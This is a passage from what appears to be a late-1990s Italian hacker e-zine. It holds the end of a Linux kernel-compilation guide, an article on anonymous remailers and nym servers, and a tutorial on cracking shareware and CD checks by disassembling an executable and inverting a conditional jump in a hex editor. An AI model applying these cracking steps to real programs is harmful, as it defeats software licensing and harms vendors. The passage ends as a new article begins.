nostra macchina e spostiamoci innanzitutto nella directory /usr/src (comando
"cd /usr/src"); dovremmo a questo punto trovare per lo meno due directory
(utilizzate il comando "ls" per mostrare il contenuto della directory in
questione): una si chiama linux-2.0.X (la versione del kernel, sempre che
l'abbiate installata, contenuta nella distribuzione da voi utilizzata e quasi
sicuramente non la pi— recente disponibile), mentre l'altra Š un link a detta
directory (ovvero scrivendo "cd linux-2.0.X" o "cd linux" si entra in pratica
nella stessa directory). Visto che noi siamo in possesso di una versione pi—
recente facciamo innanzitutto in modo di sostituire i sorgenti obsoleti con
quelli nuovi. L'operazione in questione Š eseguita dai seguenti comandi (da
eseguire ovviamente in /usr/src):

1) mkdir linux-2.0.35 (crea la directory che andr… a contenere la versione del
kernel 2.0.35 (il file linux-2.0.35.tar.gz che abbiamo appena scaricato)
2) rm linux
3) ln -s linux-2.0.35 linux (crea un nuovo link simbolico di nome linux che
punta alla directory 2.0.35)
4) tar xzvf /percorso/linux-2.0.35.tar.gz (al posto di percorso va sostituito
il percorso in cui avete scaricato i sorgenti; questa operazione estrae dal
l'archivio compresso i sorgenti del kernel e li mette nella directory linux-2.0.35
creata in precedenza).
5) rm -rf linux-2.0.X (cancella la vecchia directory dei sorgenti 2.0.X; -rf
aggiunto al comando rm (remove) serve a dire "ricorsivo e forzato", in
quanto il comando in questione solitamente non cancella directory che non
sono vuote).

A questo punto entriamo nella directory linux con un bel "cd linux" e siamo
pronti ad eseguire la fase di messa a punto del kernel, che ci permetter… di
scegliere quali componenti dello stesso includere in quello che stiamo per
compilarci. A seconda del gusto personale sono disponibili tre differenti
comandi per compiere questa operazione; la differenza sta esclusivamente
nell'interfaccia che si vuole utilizzare:

1) make config (modalit… ascii: verr… visualizzato un elenco in cui selezionare
i componenti con Y (yes), N (no) e M. Il significato di cosa sia un modulo
verr… affrontato tra poco.
2) make menuconfig (sempre modalit… testo, ma ci troviamo in questo caso di
fronte a dei comodi menu in cui effettuare la selezione con il tasto spazio).
3) make xconfig (da utilizzare se avete avviato X Window. Vi permetter… di
selezionare i componenti del kernel con pratici click del mouse).

Aggiungere elementi che non servono al kernel non comporta nulla di particolare,
se non aumentarne la dimensione e/o renderlo un po' pi— "pesante". proprio per
questo vi avevo suggerito di scrivervi su un foglietto i vari componenti hardware presenti.
Poco sopra vi ho parlato di tre differenti "valori" da attribuire ai vari componenti: Š
possibile includerne uno con yes (asterisco se avete usato menuconfig), escluderlo con
no (e in questo caso non verr… compilato nel vostro kernel), ma Š anche possibile
renderlo un "modulo" con la lettera "M". Cosa significa renderlo un modulo? Ô
presto detto: sempre per alleggerire il kernel e non includere al suo interno
componenti che non si utilizzano spesso, Š possibile rendere questi ultimi
modulari; in questo caso sar… possibile caricarli e scaricarli dalla memoria
a seconda della necessit… (se utilizzate i moduli vi consiglio vivamente di
dire yes al supporto di kerneld che troverete tra le varie opzioni: esso fa
in modo che queste operazioni siano automatiche e trasparenti all'utente; in
caso contrario dovrete farle a mano!).

Segue ora una breve spiegazione di tutte le voci selezionabili una volta digitato
"make xconfig". I concetti espressi sono ovviamente riportabili anche al caso in
cui voi abbiate digitato "make menuconfig" o "make config". (in questo ultimo
caso le scelte di default vi verranno suggerite ad ogni domanda)
Code maturity level options: dire di lasciare questa voce cos com'Š, ovvero
con la sola voce presente non selezionata Loadable module support: aggiungete
al supporto del moduli nel kernel (voce Enable loadable module support) anche
kernel deamon support: serve, come dicevo prima, a far caricare al kernel i
moduli in automatico.
General setup: in questo menu si seleziona il tipo di processore, si abilita
l'emulazione del coprocessore matematico virtuale (per chi non ce lo avesse
perch‚ Š ad esempio in possesso di un processore 486SX) e si limita la memoria
a meno di 16 mega (l'opzione serve per alcune scheda madri bacate del passato
che non riuscivano bene a gestire la memoria). Si noti come comunque il tasto
"help" possa fornirci dati supplementari. Per un processore Pentium o superiore
direi di lasciare le cose cos come stanno (a meno di non possedere un PPro: in
questo caso Š possibile specificare questo tipo di CPU).
Floppy, IDE and other block devices: questa sezione Š abbastanza lunga, ma per
fortuna c'Š ben poco da cambiare... Innanzitutto, a meno di non essere in possesso
di una scheda madre che monta il chipset CMD640 o RZ1000, direi che Š il caso di
eliminare queste due voci (il 90% delle schede madri montano in genere un chipset
Intel, per lo meno per ora). Per il resto lasciate tutto cos com'Š.
Networking options: Š una buona scelta lasciare le impostazioni cos come stanno!
SCSI support: stessa cosa per questo menu... Se non disponete di un controller
SCSI o non intendete accedere a un eventuale masterizzatore EIDE attivando
l'emulazione SCSI-ATAPI, lasciate tutto disabilitato (scelta di default).
Network device support: nel caso di una macchina che si collega ad Internet
mediante un modem selezionate come modulo la voce "ppp"; opzionalmente selezionate
anche, sempre come modulo, la voce "plip": vi torner… utile per creare connessioni
TCP/IP tra due computer con un cavo null-modem parallelo. Prima o poi vi spiegheremo
come si fa. Infine, a meno che non possediate una scheda di rete ethernet, vi
consiglio di deselezionare la voce "ethernet". Lasciate tutto il resto cos
come lo avete trovato.
ISDN subsystem: se non disponete di una connessione ISDN lasciate tutto cos
come sta, ovvero con niente selezionato. CD-ROM drivers: questa voce serve ad
includere nel kernel il supporto per CD-ROM non ATAPI (quelli insomma che
fanno uso di controller proprietario). Se possedete un CD-ROM ATAPI (dire
il 99% dei casi) lasciate tutto deselezionato.
Filesystems: seleziona i tipi di filesystem che il kernel supporter… una
volta compilato... Vi suggerisco di mettere come modulo il filesystem "minix"
e l'"extended" (non si sa mai, potrebbero anche servirvi!), di lasciare selezionato
il "second extended" (se lo deselezionate non riuscirete pi— a fare il boot della
macchina: Š quello che utilizza Linux per le sue partizioni!!), e di selezionare
con "yes" le voci "native language support", "ISO9660" (il filesystem dei CD-ROM!),
"DOS FAT", "MSDOS", "FVAT" (i nomi lunghi nelle partizioni di Windows 95), "codepage 423",
"NLS ISO 8859-1" "proc". Se pensate di aver bisogno di NFS (network filesystem, serve per
importare ed esportare il proprio filesystem in rete) selezionatelo pure come modulo.
Lasciate il resto con le impostazioni di default.
Character devices: lasciate pure le cose come stanno, a meno che non possesiate una
stampate; in quest'ultimo caso vi consiglio di selezionare il "parallel printer
support"
come modulo (non si stampa infatti tutto il giorno e cos facendo lasciamo
il kernel pi— leggero, non includendolo direttamente al suo interno!). NB: se siete
in possesso di un mouse diverso da quello seriale (ad esempio PS/2) sar… necessario
selezionare anche la voce "mouse support" e scegliere il proprio mouse dall'elenco
sottostante.
Sound card support: se disponete di una scheda sonora abilitate il supporto al sonoro
(io lo includo sempre nel kernel con "yes", ma potreste anche selezionare il tutto
come modulo). Viene ora in aiuto il foglietto di prima, quello con memorizzati i
dati della scheda sonora... Sar… infatti necessario specificarne i vari indirizzi
base, nonch‚ IRQ e DMA. In genere le voci da selezionare (per lo meno per le Sound
Blaster e relativi cloni) sono: "sound blaster", "generic OPL2/OPL3 FM syntesizer",
"/dev/dsp e /dev/audio", "MIDI interface" e "FM syntesizer". I parametri degli
indirizzi delle schede variano a seconda del modello: per esempio io inserisco
come indirizzo base "220", come IRQ "5", come DMA e DMA16 "3" e "7", come indirizzo
di base MPU401 "330". Non inserite i dati riportati qui, la vostra scheda sonora
potrebbe non funzionare affatto! Molto meglio il foglietto di cui sopra.
Kernel hacking: questo menu contiene solo due voci... lasciatele deselezioate.
La procedura di configurazione Š conclusa... Salvate la configurazione corrente
con l'apposita opzione (con "make xconfig" trovate un apposito bottone) e uscite
dal programma.
Siamo giunti alla fase di compilazione vera e propria... Quest'ultima potrebbe
richiedere solo 5 o 6 minuti se eseguita su macchine veloci, ma nel caso di un
486 potrebbe essere necessaria anche mezz'ora o pi—. Molto meglio quindi andarsi
a bere un bel caffŠ, dopo aver ovviamente digitato il seguente comando (in effetti
sono pi— comandi divisi da punto e virgola, ma Š molto meglio scriverli cos
perch‚ poi ci si pu• dedicare ad altro... In caso contrario dovreste aspettare
la terminazione del comando precedente ed inserirli uno per volta):

make dep; make clean; make zImage; make modules; make modules_install

I primi due comandi (make dep; make clean) servono a ripulire i sorgenti di
compilazioni precedenti; se avete appena installato dei nuovi sorgenti potete
anche saltare questi passaggi, ma in ogni caso Š buona abitudine eseguirli
(non si sa mai); il terzo comando (make zImage) compila il nucleo del kernel,
mentre gli ultimi due compilano ed installano i moduli al posto giusto.
Siete davvero arrivati alla fine... Un po' di pazienza e potrete avviare il
vostro sistema Linux con il kernel compilato da voi e fatto su misura per la
vostra macchina! Le operazioni da seguire sono le seguenti (si riferiscono
sostanzialmente alla Slackware, ma con qualche piccola modifica si adattano
anche alle altre distribuzioni).
1) cd /; mv vmlinuz vmlinuz.old (Dal momento che abbiamo imparato a digitare
due comandi in una sola riga separandoli da un ";" sarebbe brutto non farlo
anche adesso, non vi pare? Il primo comando vi porta nella directory principale,
altres nota con il nome di "root"; il secondo rinomina il vecchio kernel, che
si chiamava vmlinuz, in vmlinuz.old... Non si sa mai, potrebbe sempre servire,
almeno fino a quando non siete sicuri che il vostro nuovo kernel funzioni. In
questo caso cancellatelo con un bel "rm vmlinuz.old").
2) cp /usr/src/linux/arch/i386/boot/zImage /vmlinuz (copia il nuovo kernel,
contenuto in /usr/src/linux/arch/i386/boot/ - ricrodate make zImage? - nella
root directory e lo chiama vmlinux, proprio come quello vecchio).
3) OPZIONALE (non lo devono fare gli utenti della distribuzione Slackware):
potrebbe rendersi necessario spostare il kernel in una directory diversa
da "/" ed editare il file lilo.conf contenuto nella directory /etc. Se
avete problemi vi invito a mettervi in contatto con me.
4) lilo (serve ad aggiornare il LInux LOader per fargli caricare il nuovo kernel).
5) shutdown -r now (fa il reboot della macchina. Incrociate le dita ed attendete
fiduciosi il primo avvio del vostro nuovo kernel!)

TUTTO E' BENE QUEL CHE FINISCE BENE...
Se non state piangendo lacrime amare (99% dei casi) significa che il sistema
si Š riavviato con successo... Complimenti, avete appena compilato il vostro
primo kernel!!! Rientrate come root e postatevi nella directory /lib/modules
e digitate "ls" (l'equivalente del comando dir di MS-DOS). dovreste trovare
per lo meno due directory, ovvero 2.0.Xe 2.0.35. Visto che non vogliamo
sprecare spazio per nulla Š ora il caso di cancellare i vecchi moduli con un
bel rm -rf 2.0.X (nel nostro caso rm -rf 2.0.34). Si noti che in fase di
avvio potreste scorgere alcuni messaggi di errore che reclamano la presenza
dei moduli "char-major-10", "net-pf-4" e "net-pf-5". Potete tranquillamente
ignorarli, ma se urtano la vostra sensibilit… editate il file /etc/conf.modules
ed aggiungete le seguenti linee:

alias char-major-10 off
alias net-pf-4 off
alias net-pf-5 off

Al prossimo reboot non vi infastidiranno pi—...

Testi presi da un po' tutte le parti e riadattati by ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ La posta anonima. ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao a tutti!
Volevo salutare tutti i componeti del gruppo e presentarmi in modo da parlare
un pokino di come mi sono trovato a casa , con il pc acceso e le ragazza che
mi chiamava dal letto mentre avevo in mente solo come iniziare questo articolo,
chiesto dal caro amico N0body88.Beh, che volete , la parola l'avevo data , la
crittografia della posta mi sempre affascinato ed ormai Š da parecchio che la
sperimento sulla mia pelle , quindi ho deciso di condividere queste poche cose
che so con tutti.Intanto la mia ragazza ha perso ogni interesse e si Š messa a
giocare a Croc ;-[
VebbŠ, a parte tutto , volevo solo dirvi che io faccio parte del Club SPiPPoLaTorI
in veste di Webmaster e che sono stato contattato da N0body88 per scrivere qualcosa
di non molto definito sulla vostra zine.Be, eccovi accontentati!
Si inizia!
Dando per scontato che voi sappiate cosa Š e come funziona pgp , cosa sono gli
header delle mail e come leggerli , mi propongo di spiegarvi con parole facili
cos'Š e come funziona la posta anonima , partendo dagli anonymous mail server
fini ai nym server concatenati passando per PGP e tutti remailer noti.
iniziamo proprio dai remailer di uso pi— facile , i cosiddetti anonymous remailer.
Ne esistono di 3 categorie : tipo 0 , tipo 1 e tipo 2.
I remailer di tipo 0 come il defunto penet.fi erano in grado di fornire un'account
di mail anonimo e permettevano un reinstradamento delle mail sia in arrivo sia in
uscita eliminando gli header alle mail in uscita.Per reindirizzare una mail mandata
verso l'indirizzo anonimo vi era sul server un database con la corrispondenza mail
anonima-mail reale e ci• ha causato la chiusura di penet.fi ,sia perchŠ gli addetti
al server potevano avere l'accesso alla lista , sia a causa di un processo nel
quale il sysadmin dovette rivelare la vera mail di uno pseudomino del suo server.
Invece i remailer di tipo 1 sono definiti di tipo cypherpunk e hanno diverse
caratteristiche interessanti:

-non tengono in maniera assoluta i log
E mi sembra il minimo , se si vuole che la posta sia anonima
-Š possibile usare la chiave pgp del remailer per instradare i propri messaggi
E qui gi… il discorso si fa complicato!Insomma , se voltete spedire una mail
con pgp e volete essere sicuri che nessuno la legga nel tragitta fra il vostro
pc ed il server remail, usate la chiave del remailer per cifrarla.
Al resto penser… lui!
-accettano posta crittata con pgp
Se poi volete postare un messaggio crittato con pgp ad un vostro corrispondente
potete farlo ,usando la sua chiave pubblica
-permettono la concatenazione dei remailer
Logicamente , pi— passaggi fanno le mail , pi— si perdono le vostre tracce
-possibilit… di riordino dei messaggi
Il server da un tempo di latenza a caso per ogni mail.
-possibilit… di spedire la mail ad orari prestabiliti
Manda le mail sopo un'intervallo di tempo specificato.
-inserire header in pi—
Utile se si vuole postare su un ng o mettere ben in evidenza il subject , dato
che spesso i remailer levano il subject

Per avere un'idea del funzionamento di un remail di questo tipo mandate una
mail a remail@replay.com , con nel subject la parola help , o chiedetemi la
traduzione dell'help in italiano.
Gi… a questo punto potete facilmente capire che se si imposta una catena di
remailer per mandare un messaggo si pu• gi… pensare ad un discreto grado di
sicurezza.Ricordate che il numero minimo di remailer consigliato Š 3 e che
la sicurezza totale la si ottiene solo usando la crittazione dei messaggi con pgp.
In pratica la catena dei remailer Š cos: se si vuole spedire un messaggio
da A verso B , usando N remailer il percorso schematico sar… questo:

A->N1->N2->N3->B

Se poi usate remailer di tipo 0 e vi avvalete della possibilit… di crittazione
dei messaggi e del posting dei messaggi cifrati siete gi… abbastanza sicuri!
Dovete contare che chi riceve i messaggi anomini sa solo l'indirizzo dell'ultimo
remailer della catena e per mettersi in contatto con voi non ha nessun appiglio.
Anche se si risalisse al log(che non esiste) dell'ultimo remailer nessuno
potrebbe sapere dove viene inviata la mail dato che Š inserito in una chiave
pgp.Capite che cosettina interessante?
Comunque , se Š vero che un buon anonimato si ottiene usando pi— remailer vi
consiglio di non esagerare dato che spesso i remailer sono down quindi non
allungate troppo la catena altrimenti rischierete lo spezzamento, con la
conseguente perdita della mail.
Adesso passiamo alla descrizione dei remailer di tipo 2 , detti mixmaster.
Sono pi— sicuri dei remailer di tipo 1 in quanto , prevedendo anche l'invio
di messaggi crittato con pgp , incorporano anche suddivisione dei pacchetti,
crittazione con differenti algoritmi, invio attraverso diversi remailer che
crittano in cascata , riordino casuale dei messaggi e successiva "ricomposizione"
solo al destinatario.Inoltre dispongono di metodi avanzati per mandare mail
"fasulle" in modo da confondere uno spoofing in uscita ed assegnano ad ogni
pacchetto un numero univoco in modo da non permetterne il reinstradamento.
Consentono inoltre di ricevere messaggi generati dai cypherpunk remailer e
quindi di fare parte di una catena di remail di tipo 1.Fin qui i vantaggi,
ma gli svantaggi di questi remailer?
Beh , il pi— evidente per chi non usa UNIX Š il fatto che non esiste un
programma che generi dei messaggi compatibili con il formato mixmaster,
esiste solo un sorgente da poter compilare sotto DOS , ma non Š alla portata
di tutti.L'unico modo di ovviare a ci• Š ricorrere a Private Idaho ed al
l'apposito plugin per dos.Mmm, Private Idaho l'ho citato ma forse non sapete
che cos'Š.. Beh, Š un'applicazione che Š in grado di gestire catene di
remailer di tipo 1 e , con l'apposito plugin , anche di tipo 2 , ma si rivela
utilissimo usando i nym server , dei quali tratter• poco pi— avanti.
I nym server sono dei particolari server che consentono lo scambio bidirezionale
dei messaggi di posta senza che nessuna delle due persone che intendono
comunicare riveli ad altri il proprio indirizzo mail.Infatti usando un
remailer di tipo 1 o di tipo 2 il mittente conosce il destinatario ma non
viceversa.Anche se a questo problema si pu• ovviare usando un cosiddetto
"reply-block" che altro non Š che una serie di istruzioni di inoltro attravero
vari remailer crittata con pgp.Il vantaggio immediato di un reply block Š che
il destinatario della nostra missiva anonima possa contattarci , senza conoscere
il nosrto vero indirizzo mail.Un'altro vantaggio non da sottovalutare Š che si
possono (e sarebbe meglio farlo) usare pi— catene di remailer , una per l'inoltro
ed una per il reply block , aumentando cos di N volte la sicurezza , dove N Š il
numero dei remailer convolti nella procedura.Tenete anche presente che un reply
block non viene interpretato da molti software di gestione di mailinglist, qualimajordomo o listserv. Per un metodo veramente supersicuro vanno usati i nym server,
nome derivato dall'abbreviazione di pseudonymus server.Essi permettono di avere
mail veramente anonime e di avere la possibilit… di avere delle risposte alle
vostre mail senza che il destinatario si trovi ad usare pgp e la catena dei
remailer specificati nel reply block.Bisogna anzitutto capire in base a che
principio funzionano questi server per poterli sfruttare al meglio. Essi sono
qualcosa di molto simile ai remailer di tipo 0 , cioŠ hanno un database di
relazione indirizzoanonimo->indirizzo reale e viceversa ma sono molto pi—
sicuri dato che hanno la possibilit… di specificare come indirizzo reale in un
nym.Quindi , prima di usare un server di questo tipo , bisogna avere un nym
da utilizzare.Per crearlo Š sufficiente creare una chiave pgp ad uso esclusivo
della ricezione e dell'invio di mail per il server.A questa chiave vanno
aggiunte in cascata le istruzioni per i remailer che si intendono usare nella
catena di risposta.A questo punto si crea un'account sul server nym scelto e
gli si invia il nostro reply block appena creato.Da questo momneot in poi Š
possibile inviare la posta e sapere che non sar… possibile risalire a voi in
nessun modo.
Infatti i passaggi che il messaggio far… per transitare da A verso B sono i seguenti :

A->server nym->remailer1->remailer2->remailer3->B

Per aumentare l'anominato potete sempre usare questa procedura:

A->remailer1->remailer2->remailer3->server nym->remailer3.1->remailer2.1->remailer1.1->B

Nel momento che la posta arriva al server nym, viene letto il nostro nym ed eseguite le istruzioni di remail incluse.
Tutti i passaggi saranno cifrati con pgp.Se poi volete lo schema da B ad A vi accontento:

B->remailer1.1->remailer2.1->remailer3.1->nym server->remailer3->remailer2->remailer1->A

Da notare che la catena di remailer per l'invio e quella per le ricezione posono
essere differenti , e sarebbe meglio che cos fossero.Tenete sempre bene a mente
che i remailer non accettano posta sopra una determinata dimensione , informatevi
prima di usare 5 chiavi pgp e scoprire che i messaggi non sono stati inoltrati
perchŠ troppo grossi! Potete anche fare in modo che un messaggio che vi viene
inviato al nym server segua due o pi— catene di remailer , in modo che abbiate
la sicurezza che anche se una catena di remailer fosse down il messaggio vi
arriverebbe comunque.Piccolo schema, limitato a 3 diverse catene , tanto per
farvi una piccola idea dove X Š il nym server e Y siete voi, il vostro indirizzo
mail reale:

->remailer1->remailer2->remailer3--\
/ \
/ \
X-->--->remailer4->remailer5->remailer6---------> Y
\ /
\ /
->remailer7->remailer8->remailer9--/

In questo modo i messaggi vi arriveranno quasi sicuramente, ma forse vi arriveranno
anche in triplice copia , che Š meglio di nulla.In alternativa o in aggiunta
potete anche specificare catene di remailer scelte fra tutte quelle che avete
inviato nel vostro nym e delle quali avete impostato un indice di probabilit… d'uso.
Per ora direi che l'argomanto remailer Š stato aperto , adesso sta a voi decidere se
vi serve un remailer o un nym server!
Per informazioni pi— dettagliate ed in italiano sulla crittografia in ogni sua
forma leggetevi l'ottimo libro "Kriptonite" , mia seconda Bibbia , reperibile
presso www.kyuzz.org/anon/kriptonite.html , mandate un messaggio a help@nym.alias.net ,
leggete tanto e sottoscrivetevi a alt.privacy.anon-server.
Scusate se il contenuto Š troppo tecnico , ma la crtittografia Š studio, se
volete essere sicuri delle vostre mail usate sempre pgp e una catena di remailer!
Buone sperimentazioni,

RigoR MorteM , CLub SpiPPoLaTorI 1998 , rigormortem@mindless.com

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³Se io sono io e tu 6 tu ki Š il + scemo tra noi 2 ???³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Mi chiederete "ma non dovevi fare un articolo sul cracking??
Che Š questa specie di indovinello stupido???"
ed io vi rispondo prontamente
"aspettate....leggete.....e scoprirete!!".

Lancio una rapida occhiata al clock del mio Winzozz....porco Gates, sono l' 1:30 A.M.
ed ho appena incominciato!!!!
Faccio un rapido calcolo di fuso orario e penso a ci• che potrebbe fare in questo
momento la mia pulzella virtuale nel suo emisfero australe e cerco ispirazione
in una sua foto.....
(*)(*)
) . (
( v ) Bella non Š vero???
\ | /
Inoltre sono reduce da un phreakin' assault notturno svolto ieri e sono assonnato
come un maiale pakistano ma questa Š un'altra storia....magari in un prossimo articolo....

Mi ricordo ancora la 1ø volta che ho crackato un gioco....era Larry 7 Love for
Sail....copiai l'intero CD sull'H-D, aprii il file .bat di partenza con l'edit
di Dos e lessi la stringa "cd path E:\" sostitu "E:\" con "C:\Larry" (dove Larry
era la dir in cui avevo copiato il cd), e mi rantolai a terra sghignazzando come
una iena Texana.
Il gioco partiva senza cd ed io avevo crackato il mio 1ø gioco!!!.

Tutto questo per farvi capire come alle volte pu• essere facile crackare.....ma
non Š tutto oro ci• che luccica!!
Oggi vi spiegher• come fare se volete far saltare un Cd-check per un gioco
oppure registrare uno di quei bastardissimi shareware.....
E' un metodo facilissimo, semplicissimo ed efficacissimo!!!!!!!!
Come avrete notato ha un titolo un p• strano ma abbiate fede nello zio Dante...
...tutto verr… spiegato.

Occorrente: 1ø Win 32/16 Dasm....reperibile in rete
2ø Hiew.....anche questo reperibile nella stessa locazione
3ø Buona dose di puro culo....reperibile solo alla nascita purtroppo!!!

Il metodo consiste in questo:
Il Cd-check o il programma shareware esegue un cos detto Jump durante il controllo
del cd, nel caso del gioco, della veridicit… dell'user e pass, nel caso dello shareware.
Cos'Š un Jump??? semplicemente un salto (non vi preoccupate il comp. non cercher…
di gareggiare con Fiona May) prodotto da una scelta del programma...un condizionale
insomma. Che ne direste di modificarlo a nostro favore????
Ora vi spiego meglio.....

E pur mi converr… vincer la pugna!!

Faccio partire uno shareware e decido di registrarlo, cosa devo fare???
Premo il solito pulsante per registrare (di solito lo trovate in help o qualcosa
del genere) e mi appare una schermatina che mi dice "inserisci l' user e la pass"
io digito rispettivamente come user e pass "Che" "Culo!!", ma il programma mi
spara una cosa del tipo "Brutto bastardo hai inserito una pass sbagliata!!".
In questo punto il proggie ha eseguito un jump : ha confrontato la pass e l'user
con un algaritmo o con delle pass precedentemente inserite in memoria e si Š detto:
se la pass Š giusta registra il programma, se la pass non Š giusta fai apparire il messaggio
Ed Š proprio qu la succulenta idea: perchŠ non

  
invertire i jump in modo da avere....
se la pass non Š giusta registra il programma, se Š giusta fai apparire il messaggio
SEMPLICE & GENIALE!!!!!
Ecco spiegato il nome del metodo: inverto i nomi e te lo metto in culo!!!

Disassembling

A questo punto dato che la fortuna non Š dalla mia parte e la pass "che culo!!!"
non ha funzionato decido di passare ai metodi duri....
Chiudo il programma e disassemblo il file .exe di partenza dello shareware
con il Dasm subito clicko il pulsante Refs e poi String Data References.
Vi apparir… una finestra con una serie di stringhe.....fate doppio click su
quella con la frase con cui vi aveva risposto il programma (Brutto bastardo
hai inserito........), adesso spostandovi un p• in sopra evideziate la linea
in cui compare il jump condizionale Es. je 1034732 adesso segnatevi l'offset
che non Š niente altro che quel numero che compare in basso sulla finestra
del programma preceduto da @Offset Es. @Offset 0004B9E
adesso potete chiudere il Dasm.

Facciamo saltare il Jump!!!

Adesso fate partire Hiew e seguite queste istruzioni.Premete:
F1 per cambiare il drive e selezionare il file (ovviamente il .exe che avete deassemblato prima)
F4 per selezionare il modo Decode
F5 ed inserite l'Offset che vi siete segnati in precedenza Es. 0004B9E
Adesso viene il bello....
Vi accorgerete di essere capitati su di una stringa in cui nella terza colonna c'Š lo stesso tipo di jump che avevate trovato prima e di cui vi eravate segnati l'Offset, attenzione per• non Š dello stesso tipo.....Š proprio quello!!!
Ora dovete invertire il jump e lo farete spingendo F3 ed inserendo nella seconda colonna ai primi 2 numeri
al posto di 74 (je), 75(jne) oppure il contrario ovviamente....
Nel caso doveste trovare un jump diverso vi inserisco una intera lista di tutti i jump che potrete trovare nel mezzo del cammin della vostra Crack....

77cb JA X8 Jump short if above (CF=0 and ZF=0)
73cb JAE X8 Jump short if above or equal (CF=0)
72cb JB X8 Jump short if below (CF=1)
76cb JBE X8 Jump short if below or equal (CF=1 or ZF=1)
72cb JC X8 Jump short if carry (CF=1)
E3cb JCXZ X8 Jump short if CX register is 0
E3cb JECXZ X8 Jump short if ECX register is 0
74cb JE X8 Jump short if equal (ZF=1)
7Fcb JG X8 Jump short if greater (ZF=0 and SF=OF)
7Dcb JGE X8 Jump short if greater or equal (SF=OF)
7Ccb JL X8 Jump short if less (SF<>OF)
7Ecb JLE X8 Jump short if less or equal (ZF=1 or SF<>OF)
76cb JNA X8 Jump short if not above (CF=1 or ZF=1)
72cb JNAE X8 Jump short if not above or equal (CF=1)
73cb JNB X8 Jump short if not below (CF=0)
77cb JNBE X8 Jump short if not below or equal (CF=0 and ZF=0)
73cb JNC X8 Jump short if not carry (CF=0)
75cb JNE X8 Jump short if not equal (ZF=0)
7Ecb JNG X8 Jump short if not greater (ZF=1 or SF<>OF)
7Ccb JNGE X8 Jump short if not greater or equal (SF<>OF)
7Dcb JNL X8 Jump short if not less (SF=OF)
7Fcb JNLE X8 Jump short if not less or equal (ZF=0 and SF=OF)
71cb JNO X8 Jump short if not overflow (OF=0)
7Bcb JNP X8 Jump short if not parity (PF=0)
79cb JNS X8 Jump short if not sign (SF=0)
75cb JNZ X8 Jump short if not zero (ZF=0)
70cb JO X8 Jump short if overflow (OF=1)
7Acb JP X8 Jump short if parity (PF=1)
7Acb JPE X8 Jump short if parity even (PF=1)
7Bcb JPO X8 Jump short if parity odd (PF=0)
78cb JS X8 Jump short if sign (SF=1)
74cb JZ X8 Jump short if zero (ZF = 1)

Spingete F9 per salvare il file ed ancora F9 per uscire da Hiew.
AVETE CRACKATO LO SHAREWARE!!!!!!!!!
Vuolsi cos col… dove si puote ci• che si vuole?????
Adesso viene il momento decisivo....il verdetto....sarete stati cos bravi o
fortunati da azzekare il giusto jump???C'Š solo un modo per scoprirlo....
Aprite lo shareware che avete appena crackato andate su register ed inserite
la vostra pass scaramantica: la mia Š "Che" per l'user e "Culo!!!" per la pass
con variante "Caxxo" "che" "culo!!!" nel caso di richiesta di un altro codice
e sperate con tutti voi stessi di esserci riusciti....
A questo punto se avrete modificato il jump giusto apparir… una roba del genere:
"Registered" ed ora non vi resta che rantolare a terra in preda alle convulsioni
per la felicit… con la schiuma che vi esce dalla bocca.....
by Dante Alighieri

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³COME SI DIVENTA HACKER IN POCHI SEMPLICI PASSI?³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Benvenuti a tutti gli hackers/crackers/phreakers/newbies o wannabe (e chi + ne
ha + ne metta) quello che vi parla dal suo amato picci' e' N0bodY88 il cofondatore
con Zerocool della crew, del sito e di questa e-zine. Questo testo e' stato
